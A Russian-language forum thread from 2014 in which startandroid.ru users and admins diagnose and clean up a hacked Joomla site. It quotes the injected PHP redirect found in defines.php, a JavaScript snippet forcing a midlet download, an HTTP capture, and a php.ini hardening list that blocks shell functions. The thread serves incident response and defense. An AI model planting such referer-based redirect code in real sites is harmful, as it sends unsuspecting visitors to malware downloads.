Google Android - это несложно

Добро пожаловать на форум сайта startandroid.ru
Текущее время: 23 окт 2018, 09:03

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 20 ] 
Автор Сообщение
 Заголовок сообщения: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 19 июн 2014, 18:21 

Зарегистрирован: 06 ноя 2013, 08:59
Сообщений: 114
Благодарил (а): 0 раз.
Поблагодарили: 25 раз.
Если перейти по ссылке вверху или вбить в адресной строке startandroid.ru, то все норм, но если попытаться зайти из google прилетает это
Изображение

Через 5 секунд мне предлагают установить
Изображение

FireFox говорит это, причем видно, как идет куча переадресаций. Адрес открытой страницы может меняться.
Изображение

LinuxMint 17. Сомневаюсь что дело во мне :?


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 19 июн 2014, 22:16 
Аватар пользователя

Зарегистрирован: 26 июн 2012, 13:22
Сообщений: 3422
Откуда: UA
Благодарил (а): 11 раз.
Поблагодарили: 244 раз.
Donart писал(а):
LinuxMint 17. Сомневаюсь что дело во мне :?

Проблема у тебя. Потому что у меня все ОК ;)

_________________
R.id.team
Политика на форуме запрещена


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 09:21 
Аватар пользователя

Зарегистрирован: 09 янв 2012, 14:45
Сообщений: 2386
Откуда: Самара
Благодарил (а): 102 раз.
Поблагодарили: 321 раз.
Проверил. Все в порядке.

_________________
Изображение

А тот ли ты путь выбрал, разработчик?
Хочешь знать ошибки ответ? Загляни в logcat!


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 10:27 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
Все работает, проблема в вашем браузере, а вообще таких скриншотов я сколько угодно могу сделать... вот к примеру какой странный вопрос мне google-chrome сегодня задал:
ИзображениеИзображение

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 11:19 

Зарегистрирован: 06 ноя 2013, 08:59
Сообщений: 114
Благодарил (а): 0 раз.
Поблагодарили: 25 раз.
Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 11:32 
Аватар пользователя

Зарегистрирован: 10 июн 2013, 15:05
Сообщений: 584
Откуда: UA
Благодарил (а): 14 раз.
Поблагодарили: 74 раз.
Donart писал(а):
Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.


Да, я яндекс предупреждает, это факт. У меня был случай когда на моем сайте писалась такая дрянь. В итоге после 2-х месячного разбирательства выяснилось что проблема (вирус) был у хостера, но он в упор отказывался это признать.

_________________
Личные сообщения с просьбой ответить на форуме или написать программу я просто удаляю, если я в хорошем настроении. Если в плохом добавляю автора в черный список. По любым другим вопросам feel free to write to me.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 11:52 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
Donart писал(а):
Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.

Хорошо бы сразу говорить о том, что это yandex.. я к примеру никогда им не пользовался, но да результат поиска:
Цитата:
Учебник по Андроид. Уроки для начинающих
startandroid.ru
О сайте. Сайт startandroid.ru посвящен обучению разработке приложений под Android. Подробнее...

Сайт может представлять угрозу
Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных. Почему?
Посмотреть сохранённую безопасную копию
Это не угрожает вашему компьютеру и данным
Всё равно перейти на эту страницу
Переход по ссылке может нанести вред вашему компьютеру или мобильному устройству

Что харрактерно yahoo и bing, тоже говорят о malware и молчит только google и к примеру avgthreatlabs.com говорит: Currently Safe
No active malware was reported recently by users anywhere on this website.... Но что интересно, лично я мало верю yandex ;)

P.S. но yandex ПРАВ :) известный javascript redirect на сайте...
Цитата:

ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki/vse-uroki-spiskom.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/articles/listofarticles.html ( View Payload )
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mw-redirection121?v3
Location: http://alfsystem.com.my/includes/domit/1.php


P.S. а я говорил, нефик joomla баловаться и нужно использовать как минимум laravel, а лучше django или rails))))
но всеравно:
MalwareDomainList - domain is Clean.
Google-SafeBrowsing - domain is Clean.
MalwareDomainList - domain is Clean.

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 13:29 
Аватар пользователя

Зарегистрирован: 09 янв 2012, 14:45
Сообщений: 2386
Откуда: Самара
Благодарил (а): 102 раз.
Поблагодарили: 321 раз.
Короче, мы жить будем или нет?

_________________
Изображение

А тот ли ты путь выбрал, разработчик?
Хочешь знать ошибки ответ? Загляни в logcat!


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 14:06 
Аватар пользователя

Зарегистрирован: 26 июн 2012, 13:22
Сообщений: 3422
Откуда: UA
Благодарил (а): 11 раз.
Поблагодарили: 244 раз.
Mikhail_dev писал(а):
Короче, мы жить будем или нет?

Вы нет. Бэндеры до вас доберутся =)

_________________
R.id.team
Политика на форуме запрещена


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 14:18 
Аватар пользователя

Зарегистрирован: 09 янв 2012, 14:45
Сообщений: 2386
Откуда: Самара
Благодарил (а): 102 раз.
Поблагодарили: 321 раз.
И до тебя значит тоже, хох.

_________________
Изображение

А тот ли ты путь выбрал, разработчик?
Хочешь знать ошибки ответ? Загляни в logcat!


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 14:20 
Администратор
Аватар пользователя

Зарегистрирован: 07 янв 2012, 11:32
Сообщений: 1400
Благодарил (а): 0 раз.
Поблагодарили: 75 раз.
Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.

_________________
Добро пожаловать на форум сайта StartAndroid
ИзображениеИзображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 14:31 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
Mikhail_dev писал(а):
Короче, мы жить будем или нет?

да все ок, мне пришлось оперу качать, чтобы проверить.. не пашет в моих браузерах оно ) там из css грузится всякая фигня
Цитата:

в ней js который и редиректит, просто удалить хлам и все. В детали я не вдавался. Я так понял пришло оно отсюда - http://zopla.net/l/JjVWLGqfTfuLId68I3AMBnosz3 и скорее всего из какой -то рекламы. Либо же фиг его знает, нужно профайлер запускать. В общем суть в том, что идет редирект на http://alfsystem.com.my/includes/domit/1.php при условии что это переход по ссылке т.е. есть parent окно. И это проблема либо хостера либо шаблона ja_purity_ii

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 15:18 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
damager82 писал(а):
Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.

Можно попробывать поискать в js часть кода устанавливаюущую window.googleJavaScriptRedirect=1, вроде как 0 должно быть, но проще использовать сервисы вроде - http://sitecheck.sucuri.net/results/startandroid.ru
Там можно и просканировать и почистить

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 15:33 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
прикол весь в том, что этот адрес приходит в ответ от сервера при условии указания Referer:
Цитата:
GET http://startandroid.ru/

302 Found
Request
GET / HTTP/1.1
User-Agent: Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.16
Host: startandroid.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://www.google.com.ua/url?sa=t&rct=j ... 0JUTkkqQIQ
Cookie: ja_purity_ii_tpl=ja_purity_ii; 56a2310a275ea871d4a200f1af00b766=ab020b75f845e2a4a582a9e3523fb103; _ga=GA1.2.1192279240.1403264439; e21b278b1e246d6eaee3ccf5b602f8cb=ru-RU
Connection: Keep-Alive

Response
HTTP/1.1 302 Found
Server: nginx/1.4.4
Date: Fri, 20 Jun 2014 12:24:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Location: http://alfsystem.com.my/includes/domit/1.php

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 15:43 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
Как варриант... судя по этому
Код: [ Загрузить ] [ Скрыть ]
Using Javascript Syntax Highlighting
  1. var meta_refresh = document.getElementById('meta_refresh');
  2. meta_refresh.content = '';
  3. meta_refresh.parentNode.removeChild(meta_refresh);
  4. (function() {
  5.         if (top.frames.length != 0) {
  6.                 top.location = self.document.location;
  7.         }
  8.         var DOMReady = function(a, b, c) {
  9.                         b = document, c = 'addEventListener';
  10.                         b[c] ? b[c]('DOMContentLoaded', a) : window.attachEvent('onload', a)
  11.                 }
  12.         DOMReady(function() {
  13.                 var interval;
  14.                 interval = setInterval(function() {
  15.                         clearInterval(interval);
  16.                         location.href = "http://zopla.net/download?midlet_id=21&midlet_name=Sample.com+%D0%BC%D0%BE%D0%B1%D0%B8%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9+%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82&midlet_file_name=sample_com_client&auto=1";
  17.                 }, parseInt(5) * 1000);
  18.                 var cancelInterval = function() {
  19.                                 clearInterval(interval);
  20.                         };
  21.                 var links = document.getElementsByTagName('a');
  22.                 for (var i = 0; i < links.length; i++) {
  23.                         if (links[i].addEventListener) {
  24.                                 links[i].addEventListener('click', cancelInterval, false);
  25.                         }
  26.                         else if (links[i].attachEvent) {
  27.                                 links[i].attachEvent('onclick', cancelInterval);
  28.                         }
  29.                 }
  30.         });
  31. })()/*-->*/

для редиректа используется <meta> тег, на сколько я помну Location из php имеет больший приоритет, что если просто установить редирект на стартовую страницу из нее же отсекая referer -a, ну или же просто в качестве стартовой установить страницу index.php из которой просто руками послать заголовки без реферера.. пусть эта вирусня живет себе, всеравно ничего сделать не сможет ))

P.S. кстати если это не реклама - вполне может быть виджет Vk принес каку.

_________________
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 23:38 
Аватар пользователя

Зарегистрирован: 26 июн 2012, 13:22
Сообщений: 3422
Откуда: UA
Благодарил (а): 11 раз.
Поблагодарили: 244 раз.
Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!

_________________
R.id.team
Политика на форуме запрещена


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 23:38 
Администратор
Аватар пользователя

Зарегистрирован: 07 янв 2012, 11:32
Сообщений: 1400
Благодарил (а): 0 раз.
Поблагодарили: 75 раз.
Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php

Цитата:
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}


Я так понимаю - это основной источник проблем?

И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"

_________________
Добро пожаловать на форум сайта StartAndroid
ИзображениеИзображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 20 июн 2014, 23:39 
Администратор
Аватар пользователя

Зарегистрирован: 07 янв 2012, 11:32
Сообщений: 1400
Благодарил (а): 0 раз.
Поблагодарили: 75 раз.
rezak90 писал(а):
Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!

У меня хром открывает, если нажать Дополнительно и На свой страх и риск

_________________
Добро пожаловать на форум сайта StartAndroid
ИзображениеИзображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 21 июн 2014, 01:48 
Аватар пользователя

Зарегистрирован: 26 июн 2012, 13:22
Сообщений: 3422
Откуда: UA
Благодарил (а): 11 раз.
Поблагодарили: 244 раз.
Да я так само уже открываю)) но все же каждый раз не очень удобно.
P.S. наш сайт тоже ломанули :(

_________________
R.id.team
Политика на форуме запрещена


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: Startandroid.ru фишинговые ссылки?
СообщениеДобавлено: 21 июн 2014, 08:17 
Аватар пользователя

Зарегистрирован: 13 ноя 2013, 14:46
Сообщений: 1956
Благодарил (а): 10 раз.
Поблагодарили: 275 раз.
damager82 писал(а):
Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php

Цитата:
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}


Я так понимаю - это основной источник проблем?

И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"

да очень похоже, условия совпадают, учитывает реферера и редирект именно на тот сайт, поздравляю :)
вывод установить в php.ini
Цитата:
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории

сменить права доступа на папки и ограничить доступ к ftp по IP, лучше вообще закрыть и пользоваться ssh. Да и вообще нужно полностью на https переходить.

_________________
Изображение


Вернуться наверх
 Профиль  
 
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 20 ] 

Часовой пояс: UTC + 3 часа


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Powered by phpBB® Forum Software © phpBB Group
Русская поддержка phpBB